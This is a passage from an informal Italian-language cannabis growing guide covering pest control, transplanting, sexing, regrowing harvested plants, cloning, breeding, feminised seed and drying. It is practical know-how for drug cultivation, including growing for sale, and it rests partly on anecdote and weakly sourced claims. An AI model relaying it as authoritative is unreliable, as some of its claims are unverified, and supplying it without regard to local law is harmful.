detersivi per piatti in uno spruzzatore se vuoi risparmiare denaro.
Il piretro deve essere usato solo in circostanze estreme direttamente sulle piante, ma può
essere usato in uno sgabuzzino o in una serra negli angoli per eliminare ragni e simili. Si
decompone entro una settimana in elementi non-tossici, e può essere lavato da una pianta con
soluzioni detergenti ed anche acqua pura. Trovo che il piretro sia la migliore soluzione per
gli acari dei ragni, se è spruzzato sulle pianticelle ancora giovani fino alla prima
fioritura. Nella fioritura avanzata il tabacco e una soluzione di peperoncino/sapone è la cosa
migliore da farsi, con frequenza giornaliera, anche sul retro di tutte le foglie infette.
Gli acari dei ragni sono di gran lunga i peggiori aggressori del mio giardino. Ho finalmente
imparato a non portare le piante dall'esterno all'interno. Sono sempre infettate da parassiti
e minacciano di infettare l'intera zona di coltivazione al coperto. E' molto più pratico
lavorare con le stagioni e rigenerare le piante fuori in estate, piuttosto che portarle
dentro per rigenerare sotto luce costante. Comincia a coltivare una pianta dentro e portala
fuori in primavera per la fioritura. Prendi un raccolto o due, nutrila con azoto per tutta
l'estate e si rigenererà naturalmente, per fiorire ancora in autunno.
Una volta che una pianta è stata portata fuori, lasciala fuori.


TRAPIANTARE


Non si verificherà alcuno shock o al massimo uno veramente modesto se sei rapido e sensibile
nel maneggiare le tue piante. Accertati di dover trapiantare due volte, o meglio ancora, una
volta se possibile, durante l'intero ciclo di crescita. Trapiantare rallenterà la tua attività
produttiva. Ti porta via tempo, è difficile, è un lavoro duro, e mette a rischio le piante.
Comincia con il più capiente contenitore a tua disposizione, quadrato è meglio. Vaschette di
plastica da 500 grammi sono OK, e bottiglie di coca cola da 2 litri tagliate in due possono
essere abbastanza per il primo raccolto quando la pianta sta crescendo idroponicamente. Un
contenitore parallelepipedo di plastica del latte o dell'acqua andrà bene lo stesso.
Oppure comincia con semi e tagli di radici in vaschette di plastica da 500 grammi. E' meglio
avere poche giovani piantine che molte visto che necessitano di trapianti continui. Queste
vaschette più grandi occupano solo un po' di spazio in più, e consentono di trapiantare una
sola volta prima di tirare su il primo raccolto. Trapiantala in un bricco d'acqua da 4
litri (tagliato a circa 3 litri) prima di forzare la crescita dei fiori. Per rigenerare
questa pianta dopo il raccolto, trapiantala in un vaso più grande, una volta tornata nello
stadio della crescita vegetativa, secchi di pittura da 20 litri funzionano bene se puoi
risparmiare spazio, e un contenitore da 8-12 litri garantirebbe un secondo raccolto della
pianta migliore del primo, anticipando la ricrescita vegetativa.
Una nota in più:
Uno studio russo ha dimostrato che le giovani pianticelle con almeno 10 cm di terra per
sviluppare le radici in continuazione diventavano con più probabilità femmine. La fonte che
cito dice "Questo può essere perché alcuni coltivatori hanno un rapporto femmina/maschio
dell'ordine dell'80%/20%."


SESSO SUBITO


E' possibile stabilire il sesso di una pianta in anticipo, e quindi spostare le piante
maschio fuori dall'area principale destinata alla coltivazione più presto, coprendo il
ramo più basso di un pianta per 12 ore al giorno mentre è in uno stato vegetativo di luce
costante. Usa una borsa di carta nera o simile per permettere il passaggio dell'aria mentre
non fa filtrare la luce. Assicurati di approntare un ciclo regolare per questi rami coperti.
Se permetti alla luce di raggiungerli durante il periodo di buio, non possono affatto
indicarlo in anticipo.
Usa una lente d'ingrandimento per osservare in anticipo il tipo di sesso dei fiori. Una
pianta maschio avrà un fiore piccolo (carta da gioco) osservando un pre-fiore con un gambo
piccolo al di sotto di esso. Un fiore femmina è di solito a singolo o doppio pistillo,
bianco e sottile, che emerge da un calice immaturo.
Alcune persone preferiscono preforzare le piante quando sono alte 20 cm, con l'intenzione
di eliminare i maschi. Quando coltivano all'aperto, molti coltivatori non desiderano perdere
tempo, spazio o energia per le piante maschio. Soltanto mettono le piante in un ciclo di luce
di 12 ore per 2 settimane, separano le femmine dai maschi, quindi riportano i cicli di luce a
18-24 ore per continuare la crescita vegetativa per le femmine. Ricordati, questo è un
processo che porta via tempo e può posticipare la crescita delle piante di 2 settimane.
Non preforzare le piante a meno che tu non abbia molto tempo. Soltanto copri un ramo per
pianta con carta nera (impermeabile alla luce, con passaggi d'aria) 12 ore ogni giorno sotto
luce costante per forzare la prefioritura e separarle prima.


RIGENERAZIONE


E' possibile fare il raccolto delle piante e poi ringiovanirle vegetativamente per un
secondo e anche un terzo raccolto. Un secondo raccolto può essere realizzato in meno di
6-8 settimane. Dal momento che lo stelo della pianta e le radici sono già formati, la
pianta può produrre un secondo, e anche un terzo raccolto di gemme in poco più della metà
del tempo del raccolto originale. Quando fai il raccolto, taglia il 1/3 della pianta più
alto. Lascia i gruppi di foglie più rigogliosi nel centro della pianta, togliendo con molta
attenzione i germogli via dai rami. Nel 1/3 della pianta più basso, cogli alla fine i fiori,
ma lascia parecchi piccoli fiori su ogni ramo. Questi saranno la parte della pianta che verrà
rigenerata. Le molte gemme che hai lasciato sulla pianta, rigenereranno il più velocemente
possibile. Nutri la pianta con Miracle Grow o qualche altro fertilizzante ad alto contenuto
di azoto subito dopo il raccolto. Quando intendi rigenerare una pianta, accertati che non
abbia mai carenza di azoto durante la maturazione, o tutte le foglie esposte al sole cadranno,
e la tua pianta non avrà abbastanza foglie per vivere dopo il raccolto.
Una pianta dopo il raccolto può essere portata dentro per il ringiovanimento sotto luce
continua o lasciata all'aperto l'estate per ringiovanire con la lunghezza naturale dei
giorni. Ci vorranno 7-14 giorni per vedere i segni di un nuovo sviluppo quando rigeneri
una pianta. Come abbiamo detto prima, ed in contrasto con gli esempi di sviluppo normale,
i rami inferiori saranno i primi a sviluppare una nuova crescita vegetativa. Lascia crescere
la pianta vegetativamente per un po', quindi portala fuori di nuovo per la rifioritura.
Oppure lasciala dentro per la potatura vegetativa. Ora hai due o tre generazioni di piante
che crescono, ed avrai bisogno di più spazio fuori. Ma farai il raccolto con il doppio della
frequenza. Al ritmo di uno ogni 30 giorni, dal momento che hai nuovi cloni e piccole piantine
che crescono, piante vegetative pronte per la fioritura e piante rigenerate che a loro volta
fioriscono.
Rigenerare al coperto può creare problemi se le tue piante sono infettate con parassiti. Può
essere meglio creare un'area separata dentro che non permetterà alle tue piante di infettare
la principale area di coltivazione al coperto. Un'alternativa alla rigenerazione al coperto è
rigenerare fuori durante l'estate. Solamente prendi un raccolto in giugno, poi permetti alla
pianta di rigenerare lasciando alcune gemme sui rami bassi della pianta e dedicando il 1/3
centrale delle foglie della pianta al raccolto. Nutrile con azoto, ed assicurati che prendano
molto sole. Rigenererà per tutta l'estate e sarà piuttosto grande per l'autunno, quando
comincerà a fiorire di nuovo spontaneamente.


POTATURA

Le piante che sono rigenerate, clonate ed anche cresciute da semi avranno bisogno di essere
potate in certi punti per spingerle a produrre il più possibile e a mantenersi rigogliose.
Potare i rami più bassi crea un maggior flusso d'aria sotto le piante in una situazione al
coperto e crea ritagli di piante per la clonazione. Inoltre concentra l'attività della pianta
ai rami superiori che ricevono la maggior parte della luce, incrementando la produzione.
Le piante che sono state rigenerate abbisognano di una minor potatura in fase di crescita in
modo che la principale crescita rigenerata otterrà tutta l'energia della pianta. Questo
significa che una volta che la pianta ha cominciato a rigenerare una buona parte della
crescita, i rami più bassi che saranno in ombra o poco robusti dovrebbero andarsene. Lo
sviluppo deve essere sfoltito sui rami superiori in modo che rimanga solo la crescita più
robusta.
Un piacevole aspetto del rigenerare le piante è che alcune piccole gemme lasciate sulla
pianta in vista della rigenerazione non daranno frutto a nuova crescita e potranno quindi
essere raccolte per fumarle. La pianta può fornire molto materiale fumabile se preso prima
che tutti i fiori maturi si secchino e muoiano con l'arrivo della nuova crescita vegetativa.
Cerca di potare due volte una pianta rigenerata. Una volta quando comincia a rigenerare:
raccogli ogni gemma che non germoglia con la nuova crescita e fumala. Quindi dopo, pota di
nuovo per prendere i ritagli più bassi da clonare e sfoltisci la crescita superiore in modo
da produrre grosse gemme.
Se una pianta rigenerata non viene affatto potata, la pianta risulta piena di diramazioni,
non crea gemme grandi ed il prodotto totale sarà considerevolmente ridotto.


RACCOGLIERE ED ESSICCARE

Fare il raccolto vuol dire cogliere i frutti di tanto duro lavoro, ed è il tempo più
piacevole che impiegherai nel tuo giardino.
Si fa il raccolto alle piante quando i fiori sono maturi. Generalmente, si stabilisce
che un fiore è maturo quando i pistilli iniziano a diventare marroni, arancioni, ecc.. e
cominciano a regredire in un falso baccello. I baccelli si gonfiano con resine normalmente
riservate alla produzione dei semi, e così otteniamo gemme mature con peli rossi e dorati.
E' interessante notare che il tempo del raccolto controlla lo sviluppo delle gemme. Se si è
fatto il raccolto in anticipo con solo alcuni dei pistilli che hanno cambiato colore, le
gemme avranno un contenuto di THC più puro ed avranno meno THC che muta in CBD e CBN. Le
sostanze psicotrope creeranno l'aroma dell'erba, e controlleranno il grado di insensibilità e
di sballo correlato ad un'elevata concentrazione. Un contenuto di THC puro crea un effetto
molto cerebrale, mentre un contenuto elevato di THC, di CBD e di CBN renderà le piante più
inclini a suscitare intontimento o un senso di annebbiamento. Le gemme colte tardi, quando
pienamente maturate conterranno di norma questi elevati livelli di CBN, CBD e certamente
non possono essere ciò che preferisci una volta che hai provato campioni differenti colti
in momenti differenti. Non prestare ascolto agli esperti, decidi tu in base a ciò che
preferisci.
Ricordati, una gemma pesa di più quando completamente matura. E' ciò che alla maggior parte
dei coltivatori piace vendere, ma prendi alcune giovani gemme per te, ogni settimana
precedente il raccolto, e decidi come ti pare. Coltiva il resto fino ad una piena maturità
se progetti di venderlo.
Molti coltivatori in erba (nel senso che sono nuovi del giro) vogliono raccogliere in
anticipo, perché sono impazienti. Questo è OK! Soltanto devi prendere le gemme dalla cima o
dalla parte centrale della pianta. Lascia maturare il resto. Spesso, le cime delle piante
matureranno per prime. Raccoglile e lascia continuare il resto della pianta a maturare.
Noterai che le gemme più basse diventano più grandi e più gonfie e increspate quando
raggiungono una completa maturazione. Con più luce a disposizione nella parte bassa della
pianta ora, la pianta produce di più in questo modo con il passare del tempo, rispetto a
prendere un singolo raccolto.
Serviti di una lente d'ingrandimento per cercare di vedere i tricomi capitati (piccoli
cristalli di THC sulle gemme). Se sono soprattutto chiari, non marroni, il punto massimo
dell'aroma floreale è prossimo. Una volta che sono diventati per lo più tendenti al
marrone nel colore, la concentrazione di THC comincia a scemare e la potenza ottimale del
fiore si allontana, calando rapidamente con l'esposizione alla luce e al vento. Non fare
il raccolto troppo tardi! E' facile stare molto attenti e raccogliere dopo che buona parte
della potenza se ne è andata. Controlla le piante ed impara a riconoscere il picco della
potenza floreale.
Non conservare l'erba al sole, perché riduce la potenza. Conservala a lungo stendendo le
gemme superiori in basso in uno spazio ventilato. Questo è tutto ciò di cui hai bisogno
per avere un gran raccolto. Essiccare in un sacchetto di carta funziona ugualmente, e può
essere molto più conveniente. La gemma ha un aroma fantastico quando è essiccata lentamente
per la durata di una settimana o due.
Se hai molta fretta, è OK essiccare una piccola quantità in-tra fogli di carta o in un
sacchetto di carta in un forno a microonde. Vacci piano e controllale, non bruciarle.
Posiziona la manopola sulla funzione di scongelamento per una più lenta, migliore
essiccazione, sebbene in questo modo sarà un fumo acre.
Un disidratatore di alimenti o una macchina per conservare il cibo essiccherà la tua maria
in poche ore, ma non avrà lo stesso aroma di una essiccata lentamente, anche se sarà molto
simile. E questo accelererà il tuo periodo di raccolto (che può essere snervante, con tutta
questa erba sparpagliata ad essiccare).
Le gemme secche fino ai gambi sono abbastanza friabili da sbriciolare, conservale quindi in
un contenitore sigillato, facendo passare aria e rigirando le gemme ogni giorno per due
settimane.
Una volta un coltivatore esperto mi ha detto di essiccare in un'area attigua alla casa (come
il garage) in modo che la temperatura di giorno si alza e di notte si abbassa, mentre la
pianta si essicca. Se tratti la pianta come se fosse ancora viva, questa userà una parte
della sua clorofilla durante il processo di essiccazione, ed il fumo sarà meno acre.


CLONARE

La clonazione è una riproduzione asessuata. Vengono effettuati dei tagli da una pianta madre
in crescita vegetativa e vengono immersi in ambiente idroponico per essere coltivati come
piante distinte. Il risultato sarà piante identiche in tutto alla pianta madre.
La clonazione mantiene le caratteristiche della tua pianta preferita. La clonazione può
produrre un oceano di verde da una sola pianta, per questo è un mezzo potente per grandi
raccolti, e ti permetterà di riempire uno stanzino rapidamente con le tue piante favorite.
Quando trovi una pianta che vorresti ti fosse "amica" per il resto della tua vita, puoi
mantenere in vita le caratteristiche genetiche di quella pianta per decenni e passarle ai
figli dei tuoi figli. Diffondile e condividile con altri, per conservare una copia, dovesse
mai la tua discendenza di piante estinguersi. Un clone può essere preso da un altro clone
almeno 20 volte, e probabilmente di più, così non preoccuparti del mito del vigore ridotto.
Molti rapporti indicano che non è un problema.
La clonazione ti esporrà al rischio di funghi o parassiti che distruggono tutto il raccolto,
così è importante scegliere piante che mostrano buona resistenza ai funghi e agli animali
nocivi. Scegli la pianta che senti sarà la più affidabile da riprodurre in larga scala,
basandoti sullo stato di salute, sul tasso di accrescimento, sulla resistenza ai parassiti e,
naturalmente, sulla potenza del fumo. La qualità dell'intensità e del tipo di sballo che
avrai, sarà un fattore determinante da non trascurare.
Fai dei tagli per clonare prima di spostare le piante dall'area di crescita vegetativa
all'area di fioritura. I rami bassi sono tagliati per incrementare la circolazione dell'aria
sotto la volta verde. I cloni che hanno attecchito sono spostati nell'area di crescita
vegetativa, e i nuovi cloni sono fatti partire nell'area di clonazione usando i tagli dei
rami inferiori. Ogni ciclo di crescita impiegherà dalle 4 alle 8 settimane, così puoi
coltivare in continuazione in 3 stadi, e raccogliere ogni 6-8 settimane.
Alcuni tipi di piante sono più difficili da clonare che altri. E' riportato che le piante con
grandi germogli non si clonano molto bene. Una delle mie piante favorite, Mr. Kona, è la più
sbalorditiva erba che abbia mai fumato, ma clonarla è veramente un'impresa. Che sfida! Ho
osservato altre varietà che avevano attecchito molto più rapidamente, ma poi non mi ha fatto
il che minimo effetto! Una volta che hai trovato quella psicoattiva, quasi le proprietà
allucinogene di alcuni ibridi Indica/Sativa, non vorrai più fumare un'Indica pura. L'Indica
è comunque un fantastico medicinale, così preferisco coltivare anche alcuni pezzi puri.
Se fai il raccolto di una pianta, puoi assaggiarlo, e decidere di clonare. Scegli i tuoi
favoriti 2 o 3 tipi differenti di piante da clonare, in base all'esito dell'assaggio del
raccolto. Le piante che vuoi clonare possono essere rigenerate mettendole sotto luce
costante. In poche settimane avrai molti tagli vegetativi pronti per la clonazione e per
preservare le tue piante preferite. Tieni sempre una pianta madre in stato vegetativo per
ogni specie che vuoi mantenere in vita. Se porti alla fioritura tutti i tuoi cloni, puoi
finire con l'eliminare una specie se non possiedi una pianta destinata ad essere madre. Ho
ucciso accidentalmente una specie sacra in questo modo; le mie piante, dopo il raccolto,
non sono riuscite a rigenerare e la specie si sarebbe completamente estinta se non l'avessi
precedentemente data ad amici perché la coltivassero anche loro. Sono stato fortunato, ed
un amico mi ha preparato un altro clone di questa specie da coltivare come pianta madre per
la produzione di nuovi cloni.
Dopo due mesi ogni pianta di marijuana può essere clonata. Piante fiorite possono essere
clonate, ma la procedura può essere notevolmente più lunga. E' meglio attendere, e rigenerare
vegetativamente piante che hanno subito raccolti. Una singola pianta rigenerata/raccolta
può generare centinaia di cloni. Prima di fare dei tagli, lascia la pianta senza azoto per
almeno una settimana, in modo che la pianta non diventi estremamente verde, così ci vorrà più
tempo per attecchire. Prendi i tagli dal 1/3 più basso della pianta, quando fai una potatura
ordinaria. Taglia giovani piccioli da uno stadio vegetativo, una pianta matura alta 8-12 cm
con un gambo del diametro di 2,5-5 mm. Tagliala con una lama di rasoio sterile o con un
coltello di precisione (passato sul fuoco) ed immergi l'estremità inferiore del taglio del
clone in una vasca di acqua distillata con l'aggiunta di 1/4 di cucchiaino di
Peters 5-50-17 ogni 4 litri. Poi, taglia via gli ultimi 5 mm mentre viene immersa, facendo
un taglio diagonale. Rimuovi il clone dalla vasca e infilalo in una soluzione liquida per
cloni seguendo le indicazioni sull'etichetta. Cospargilo di RootToneF e mettilo in vaschetta
o in un ambiente per la clonazione. Anche le piante fiorite possono essere clonate, ma ci
può volere più tempo, e non può avere un indice di successo molto elevato. Clonare diventa
più rapido con le soluzioni liquide per sviluppare le radici, in una vaschetta scaldata e
areata, con illuminazione attenuata ed alta umidità. Mettere i tagli in cubi da 3 cm d lana
di roccia in una vaschetta funziona ugualmente bene. In uno sgabuzzino puoi recuperare
spazio sopra l'area di coltivazione in modo che il calore della lampada scaldi la vaschetta
(raccolta passiva) e ti consenta di risparmiare la spesa e la seccatura di un riscaldatore
per acquari (24 dollari) o un sistema di riscaldamento agricolo (costoso). Una doppia
lampada fluorescente da 10 cm sarà perfetta. Lascia le lampade accese per 24 ore al giorno.
I tagli devono mettere radici in 2-3 settimane.
Ho trovato solo una soluzione liquida a base di ormoni per mettere radici che non costava
oltre i 10 dollari. (Olivia's Gel ne costava 12 per un flacone da 50 grammi. Cazzo, cos'è '
sta roba, oro?) Ho trovato alcuni dipNgrow (lett: immergi e coltiva) per 9 dollari, mi sono
ritenuto fortunato, e ho acquistato una vaschetta e un coperchio trasparente per 7 dollari.
Un coperchio trasparente per vaschette o una copertura per serre è indispensabile per
portare l'umidità al 90% (livello della serra). L'ormone liquido per mettere radici sembra
essere molto più efficace delle polveri. Alcuni tipi disponibili sono Olivia's, Woods, e
dipNgrow.
Miscela una soluzione per cloni diluita di nutrimenti per piante ad alto contenuto di
fosforo (high P) come il Peter's 5-50-17, elementi in tracce e sale inglese e quindi
immergi le piante in una soluzione per la formazione di radici secondo le istruzioni
sull'etichetta. Tutti i nutrimenti sopra citati dovrebbero essere aggiunti in quantità
estremamente piccole, il 25% di ciò che normalmente sarebbe usato per crescere le piante.
O serviti di una soluzione già preparata come l'Olivia's Rooting Solution. E' stato
riportato che lo sciroppo di mais integra la richiesta di zuccheri da parte della pianta
durante la fase della clonazione, dal momento che è composto di zuccheri vegetali.
Usa anche un fungicida in polvere, come il RoottoneF per accertarti che i cloni non
marciscano grazie ai funghi. Questo è importante, dal momento che i cloni e i funghi
gradiscono le condizioni che hai ricreato per un buon attecchimento: luce mite; 22-26
gradi; umidità elevata.
Nella lana di roccia non c'è alcun bisogno di ossigenare la soluzione, soltanto tieni i cubi
in 0,5 cm di soluzione in modo che loro stiano stabili e continuamente inumidite. Cerca di
tenere i cloni uniformemente distanziati, e spruzza loro acqua una volta al giorno per
mantenerli umidi e freschi. Togli i cloni se sono malaticci e morenti, per tenerli a
distanza da quelli sani.
Un altro metodo è quello di tenere a galla i tagli in una vaschetta piena di soluzione su
pannelli di polistirene (polistirolo) a disposizione, o fogli di stirene (materiale per
spedizioni/imballaggi) con buchi fatti con un punzone, in modo che le cime e le foglie siano
fuori dall'acqua. Togli tutte le foglie grandi, lasciando solo le foglie più piccole in cima
per ridurre la domanda nei nuovi gambi che mettono radici. Ossigena la soluzione della
vaschetta con una pompa d'aria e una pietra pomice. Tieni la soluzione a 22-26 gradi per
ottenere i migliori risultati. Cambia la soluzione ogni giorno se non usi una pietra pomice
e una pompa, in modo che l'ossigeno sia sempre disponibile ai cloni. Una settimana più tardi,
stacca le foglie gialle dai tagli per ridurre la richiesta d'acqua quando i cloni cominciano
a mettere radici e attecchiscono.
Compra una vaschetta con un coperchio trasparente appositamente studiato per la formazione
delle radici in un negozio specializzato in articoli per giardinaggio al coperto. Devi tenere
l'umidità molto alta per i cloni. Metti i tagli in una vaschetta per il ghiaccio coperta con
cellophane ed una luce brillante in basso se non vuoi spendere soldi per la vaschetta e il
coperchio.
E' anche possibile piazzare direttamente un taglio bagnato in un blocco umido di schiuma
floreale con buchi fatti con punzoni, o vermiculite in una tazza; assicurati che i tagli
attecchiscano in un ambiente costantemente umido. Cubetti di torba in bustine non sono
raccomandati, come indicano risultati di rapporti pubblicati secondo i quali non erano
buoni per i cloni che devono mettere radici. Metti i cubetti iniziali in una vaschetta di
soluzione. Controlla due volte al giorno per essere sicuro che i cubi siano umidi, non
inzuppati, né asciutti. Dopo di 2-3 settimane, appariranno delle radichette in fondo ai
baccelli. Trapianta a questo punto all'area di coltivazione, facendo attenzione a non
scompigliare ogni radice esposta.
Un coltivatore ci scrive:
Ho virtualmente cercato di far attecchire tutti i cloni attenendomi a questo schema:
0. Prepara i tagli rimuovendo le foglie grandi sulla punta; lascia che si riprenda dal
taglio.
1. Mentre li tieni immersi in acqua, fai un taglio diagonale sull'estremità inferiore del
gambo affinché metta radici.
2. Immergili in Rootone, quindi infilza il gambo per circa 5 cm in una vaschetta da mezzo
chilo con metà vermiculite, metà perlite, che hai messo in un raffreddatore di polistirolo.
3. Spruzza i tagli con una completa soluzione fertilizzante molto leggera.
4. Copri la cima del raffreddatore con Saran Wrap, quindi fai dei buchi per la ventilazione.
5. Tieni il raffreddatore ad una temperatura relativamente mite, luce bassa, e spruzza i
tagli giornalmente.
6. I tagli devono mettere radici in circa 3 settimane.
La clonazione non è semplice quanto cominciare dai semi. Con i semi puoi avere piante alte
50 cm in 6 settimane o meno. Con i cloni ci possono volere 6 settimane perché la pianta
germogli le radici e la nuova crescita. I semi risultano facilmente due volte più veloci se
possiedi uno spazio interno vuoto inutilizzato che richiede di essere messo in uso
rapidamente. Riproduci sempre poche gemme per produrre semi, anche se ritieni di
clonare per la maggior parte del tempo, potresti perdere tutto e non avere nulla, e in tal
caso i tuoi semi potrebbero salvarti il culo.
Clonare nella lana di roccia sembra funzionare alla grande, e non è richiesta alcuna pompa
d'aria. Ho pagato 9 dollari per 98 cubi di lana di roccia per cominciare. Una vaschetta di
plastica è disponibile per 0,95 dollari e contiene 77 cubi in caselle consentendo ai cubi di
essere tenuti in un contenitore di soluzione nutriente. Possono essere facilmente rimossi e
messi in un cubo più grande di lana di roccia per la coltivazione quando i tagli cominciano
a mettere radici.



RIPRODUZIONE

E' possibile riprodurre e scegliere più velocemente i tagli da piante che crescono,
fioriscono, e maturano. Alcune piante saranno naturalmente migliori di altre a questo
riguardo, ed è facile selezionare non solo le piante più potenti da clonare o riprodurre,
ma ugualmente le piante che crescono/fioriscono più velocemente. Trova la tua pianta dalla
crescita più rapida, e riproducila con il tuo maschio "dalla miglior altezza" per una rapida
fioritura e una potente discendenza della specie. Clona la tua pianta più rapida, più alta
per avere un giardino a singolo raccolto nel minor tempo possibile. Con il passare del tempo,
risparmierai una bella attesa nel maturare le tue piante.
Quando un maschio comincia a fiorire (2-4 settimane prima delle femmine) dovrebbe essere
allontanato dalle femmine in modo che non possa impollinarle. Deve essere portato in un'area
separata. Ogni posto che garantisce solo qualche ora di luce al giorno dovrebbe essere
adeguato, anche vicino ad una finestra in una stanza separata all'interno della casa. Metti
un giornale o un vetro sotto la pianta maschio per raccogliere il polline quando i fiori lo
emettono.
Tieni un maschio vivo indefinitamente incurvandone la cima rigidamente e mantenendolo in uno
stato di shock non forte in modo da ritardarne la maturazione. Oppure prendi le cime quando
maturano e metti i rami in acqua, sopra un pezzo di lastra di vetro. Scuoti i rami ogni
mattina perché rilascino il polline sopra il vetro e quindi scartalo con una lama di rasoio
per raccoglierlo. Un maschio potato in questa maniera resta vivo indefinitamente e continuerà
a produrre fiori se riceve adeguati periodi di buio. Questo è molto meglio che mettere il
polline nel congelatore! Il polline fresco è sempre meglio.
Salva il polline in un sacchetto a prova d'aria nel congelatore. Sarà buono per circa un mese.
Possono passare più e più settimane prima che le femmine siano pronte per l'impollinazione.
Metti una carta assorbente nel sacchetto con il quale agire una volta scongelato.
Una pianta è pronta per l'impollinazione 2 settimane dopo che i grappoli dei fiori femmina
appaiono per la prima volta. Se la impollini troppo presto, non può funzionare. Aspetta fino
a quando i fiori femmina si sono formati bene, ma soprattutto quando i peli stanno comparendo.
Spegni tutti i ventilatori. Usa un sacchetto di carta per impollinare un ramo di una pianta
femmina. Usa polline diverso preso da due maschi su rami separati. Copri il sacchetto attorno
al ramo e sigillalo all'inizio del ramo. Scuoti il ramo vigorosamente. Bagna il sacchetto di
carta dopo alcuni minuti con uno spruzzatore e quindi rimuovilo con molta attenzione. Usa
anche grandi borse di plastica con chiusura a lampo. Infila la borsa sul ramo del maschio e
scuoti il polline che si libera. Rimuovi attentamente quello cattivo e chiudi la lampo.
Dovrebbe essere ricco di polvere di polline. Per impollinare, mettilo sopra un singolo ramo
della femmina, chiudendo la lampo lateralmente intorno al gambo in modo che nessun polline
sfugga all'esterno. Scuoti la borsa ed il gambo allo stesso tempo. Lasciali stabilirsi per
un'ora o due e scuotila di nuovo. Toglila alcune ore più tardi. Il tuo ramo è ora ben
impollinato e deve mostrare i segni di una visibile produzione di semi in 2 settimane,
con semi maturi che fendono i calici entro 3-6 settimane. Un ramo impollinato può produrre
centinaia di semi, così in molti casi non dovrebbe essere necessario impollinare più di uno
o due rami.
Quando incroci due varietà diverse, verrà creato una terzo tipo di pianta. Se conosci quali
caratteristiche stai cercando in una specie nuova, avrai bisogno di diverse piante da
scegliere per avere una probabilità maggiore di trovare tutte le qualità desiderate. Qualche
volta, se le due piante incrociate possiedono geni dominanti per determinate caratteristiche,
sarà impossibile ottenere la pianta che desideri da un singolo incrocio. In questo caso è
necessario incrociare due piante dallo stesso lotto di semi risultanti dall'incrocio iniziale.
In questo modo si potranno liberare i geni recessivi, e le caratteristiche della pianta
che desideri possono essere ottenute solo in questa maniera.
Di solito, è preferibile incrociare soltanto due specie che sono molto differenti. In
questa maniera uno solo normalmente arriva al punto descritto come "vigore ibrido." In
altro parole, spesso le specie migliori sono create prendendo due specie molto diverse
tra loro ed accoppiate. Le piante meno robuste possono essere il risultato di un incrocio,
dal momento che assimilano i tratti del gene recessivo che può portare ad una diminuzione
della potenza.
La specie ibrida sarà completamente differente l'una dall'altra. Ogni pianta cresciuta
dallo stesso lotto di semi raccolti dalla stessa pianta, sarà diversa. E' quindi necessario
provare ciascuna pianta separatamente e decidere per ognuna se le caratteristiche sono di
tuo gradimento. Se trovi una che sembra essere di gran lunga superiore alle altre in termini
di fioritura precoce, alta produttività e che ti dà uno sballo strafico, quella è la pianta
da clonare e da riprodurre in continuazione.
La genetica avanzata va ben oltre lo scopo di questo lavoro. Consulta: 'Marijuana Botany'
(Botanica della Marijuana) di Smith, per informazioni più dettagliate su questo campo.



SINSEMILLIA

Quando ad una pianta femmina non è permessa l'impollinazione, cresce ricca di resina
indispensabile per la produzione dei semi. Falsi baccelli si gonfiano con resina carica di
THC ed i pistilli diventano rossi ed arancioni e si ritirano nei baccelli. Allora è il
momento di fare il raccolto alla pianta. I semi non fanno parte della gemma quando i fiori
maturano. Questo si chiama Sinsemillia e significa semplicemente "senza semi".


IMPOLLINAZIONE

E' possibile incrociare le tue due piante femmine favorite per generare una nuova specie
di semi che produrrà tutte le piante femmine. Preferibilmente, queste due piante dovranno
essere di tipo differente, non da semi provenienti dalla stessa madre.
Questo creerà la specie migliore, dal momento che non porterà all'incrocio. E' più facile
stimare la qualità delle piante femmine rispetto a quelle maschio, visto che il fumo è più
potente e più facile da giudicare è la qualità migliore. Le piante nate da semi in questa
maniera saranno tutte piante femmine perché non ci sarà la possibilità di avere cromosomi
maschio da genitori femmina.
Usa Acido Gibberellico (gibberellina) su un ramo di una pianta femmina per produrre fiori
maschi. L'Acido Gibberellico viene venduto nei negozi di articoli per serre che tengono
prodotti per la riproduzione e ibridazione di piante. Spruzzalo sulla pianta una volta
ogni giorno per 10 giorni con 100 parti per milione di acido gibberellico. Quando si formano
i fiori maschi, impollina i fiori dell'altra pianta femmina che hai scelto. Impollina
soltanto un ramo a meno che tu non voglia un fottio di semi! Una volta che il ramo ha
fiori maschi, taglia il ramo e mettilo ad attecchire in acqua, con un vetro al di sotto
per recuperare il polline maschio quando cade. Usa una soluzione per mettere radici simile
alla precedente soluzione per la clonazione. Raccogli il polline con un sacchetto di
plastica messo sul ramo e scuotilo. Usa una lama di rasoio per accumulare il polline
caduto ed aggiungere pure quello nel sacchetto.
E' anche possibile impollinare i fiori della pianta su cui crei i fiori maschi,
incrociandoli con se stessi. Questo viene usato per conservare le caratteristiche
di piante speciali. Anche con la clonazione si conservano le caratteristiche delle
piante, ma non si potranno conservare i semi per impiegarli in un secondo tempo.
Incrociare una pianta con se stessa può portare a problemi di incrocio, così non può essere
una soluzione definitiva nella maggior parte dei casi.
Una volta ho provato ad usare acido gibberellico, spruzzato su una femmina sana, ogni giorno
per oltre una settimana. Non è apparso alcun fiore maschio sulla pianta. I suoi benefici
pertanto possono essere variabili.



ODORI E IONI NEGATIVI

Generatori di ioni negativi sono stati usati per anni per ridurre gli odori in una stanza
di coltivazione, ma sono giunti rapporti secondo i quali un generatore di ioni negativi
aumenta la velocità di accrescimento e la produzione. Non c'è alcuna evidenza che possa
confermarlo, comunque ha un senso, dovuto al fatto che le persone e gli animali sembrano
essere alterati positivamente dagli ioni negativi nell'aria, così a maggior ragione possono
"sentirsi" meglio le piante. Prova a metterne uno nella stanza di coltivazione. Puoi notare
come le gemme non hanno molto aroma quando le cogli, ma che in alcuni casi può risultare
gradevole.
Un generatore di ioni negativi può essere acquistato per 15, 100 dollari a seconda del
modello e della potenza erogata. Alcuni hanno cicli invertiti che accumulano la polvere
in un piatto caricato. E' anche possibile usare una lamina di alluminio con la messa a
terra e porla sul muro o sulla mensola dove si trova lo ionizzatore, per raccogliere queste
particelle. Soltanto pulisci completamente la lamina una volta al mese. Dovrebbe essere
collegata ad un cavo elettrico di messa a terra. Se non ricopri il muro e la mensola con una
carta o una lamina, il muro diventerà nero dalla polvere che riceve dall'aria, e poi ti
toccherà ridipingerlo.


OSSIGENO

L'O2 alle radici è un grande problema, dal momento che la pianta lo richiede per assimilare
i nutrimenti, e liberarli dalle tossine, ecc... Una delle cose più facili da fare è servirsi
di cibo a base di perossido di idrogeno nell'acqua per aumentare la disponibilità di ossigeno
nell'acqua stessa. H2O2 ha un atomo di ossigeno in più che si dividerà facilmente e che potrà
essere usato dalla pianta. Oxygen Plus è un alimento per piante che contiene il 25% di
perossido di idrogeno ed è perfetto per questo uso.
